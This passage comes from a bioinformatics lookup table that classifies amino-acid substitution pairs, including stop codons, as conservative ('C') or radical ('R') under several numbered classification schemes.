",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"C",("C","D"):"R",("Q","D"):"C",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"C",("C","E"):"R",("Q","E"):"C",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"C",("I","A"):"R",("L","A"):"R",("M","A"):"R",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"R",("C","N"):"R",("Q","N"):"C",("G","N"):"R",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"R",("T","N"):"R",("W","N"):"R",("Y","N"):"R"
,("V","N"):"R",("Q","C"):"R",("G","C"):"R",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"R",("T","C"):"R",("W","C"):"R",("Y","C"):"R",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"R",("T","Q"):"R",("W","Q"):"R",("Y","Q"):"R",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"R",("S","I"):"R",("T","I"):"R",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"R",("S","L"):"R",("T","L"):"R",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"R",("S","M"):"R",("T","M"):"R",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"C",("T","F"):"C",("W","F"):"R",("Y","F"):"R",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"R",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"R",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},4:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"C",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"C",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"C",("R","Y"):"C",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N
"):"R",("H","C"):"R",("H","Q"):"C",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"C",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"C",("H","Y"):"C",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"C",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"C",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"C",("K","Y"):"C",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"R",("A","G"):"C",("A","I"):"R",("A","L"):"R",("A","M"):"R",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"R",("N","C"):"C",("N","Q"):"R",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"R",("N","V"):"R",("C","Q"):"R",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"R",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"C",("Q","P"):"R",("Q","S"):"R",("Q","T"):"R",("Q","W"):"C",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"R",("I","S"):"R",("I","T"):"R",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"R",("L","S"):"R",("L","T"):"R",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"R",("M","S"):"R",("M","T"):"R",("M",
"W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"C",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"R",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"R",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"C",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"C",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"C",("Y","R"):"C",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"C",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"C",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"C",("Y","H"):"C",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"C",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"C",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"C",("Y","K"):"C",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"R",("G","A"):"C",("I","A"):"R",("L","A"):"R",("M","A"):"R",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"R",("C","N"):"C",("Q","N"):"R",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"R",("V","N"):"R",("Q","C"):"R",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"C",("S
","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"R",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"C",("P","Q"):"R",("S","Q"):"R",("T","Q"):"R",("W","Q"):"C",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"R",("S","I"):"R",("T","I"):"R",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"R",("S","L"):"R",("T","L"):"R",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"R",("S","M"):"R",("T","M"):"R",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"C",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"R",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"R",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},5:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"
R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"C",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"C",("N","L"):"C",("N","M"):"C",("N","F"):"R",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"R",("N","V"):"C",("C","Q"):"C",("C","G"):"C",("C","I"):"C",("C","L"):"C",("C","M"):"C",("C","F"):"R",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"R",("C","V"):"C",("Q","G"):"C",("Q","I"):"C",("Q","L"):"C",("Q","M"):"C",("Q","F"):"R",("Q","P"):"C",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"R",("Q","V"):"C",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"C",("I","S"):"C",("I","T"):"C",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"C",("L","S"):"C",("L","T"):"C",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"C",("M","S"):"C",("M","T"):"C",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"C",("F","V")
:"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"C",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"C",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"C",("L","N"):"C",("M","N"):"C",("F","N"):"R",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"R",("V","N"):"C",("Q","C"):"C",("G","C"):"C",("I","C"):"C",("L","C"):"C",("M","C"):"C",("F","C"):"R",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"R",("V","C"):"C",("G","Q"):"C",("I","Q"):"C",("L","Q"):"C",("M","Q
"):"C",("F","Q"):"R",("P","Q"):"C",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"R",("V","Q"):"C",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"C",("S","I"):"C",("T","I"):"C",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"C",("S","L"):"C",("T","L"):"C",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"C",("S","M"):"C",("T","M"):"C",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"C",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"C",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},6:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",(
"K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"R",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"R",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"C",("G","P"):"C",("G","S"):"R",("G","T"):"R",("G","W"):"C",("G","Y"):"R",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C"
,("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"R",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"R",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"
C",("L","G"):"C",("M","G"):"C",("F","G"):"C",("P","G"):"C",("S","G"):"R",("T","G"):"R",("W","G"):"C",("Y","G"):"R",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"},7:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K",
"P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"R",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"C",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"R",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"C",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("